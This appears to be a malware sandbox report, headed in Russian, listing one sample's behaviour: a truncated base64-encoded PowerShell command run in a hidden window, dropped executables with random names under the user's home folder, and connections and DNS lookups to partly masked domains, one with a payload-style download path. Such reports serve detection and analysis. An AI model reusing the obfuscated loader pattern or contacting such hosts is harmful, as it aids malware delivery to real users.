Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0ASQB0AEUAbQAgACgAIgBWACIAKwAiAEEAUgBJAEEAYgBMAEUAOgBYACIAKwAiADEAQQAiACsAIgAwAHoATgAiACkAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\1348160.cvr
- %HOMEPATH%\qvwis2h\mxk437n\y6ecz5.exe
- %HOMEPATH%\qvwis2h\mxk437n\y6ecz5.exe
- 'cu####lulut.info':443
- 'se####aloutfits.com':80
- http://se####aloutfits.com/gfeed/j154TTx/
- 'cu####lulut.info':443
- DNS ASK cu####lulut.info
- DNS ASK ta###hizhi.com
- DNS ASK we#######np###y.com
- DNS ASK ne#.###fitsbrand.com
- DNS ASK se####aloutfits.com
- DNS ASK kh####pdn247.com
- DNS ASK je###issan.com
- DNS ASK ne####cept-ci.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0ASQB0AEUAbQAgACgAIgBWACIAKwAiAEEAUgBJAEEAYgBMAEUAOgBYACIAKwAiADEAQQAiACsAIgAwAHoATgAiACkAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQ...' (со скрытым окном)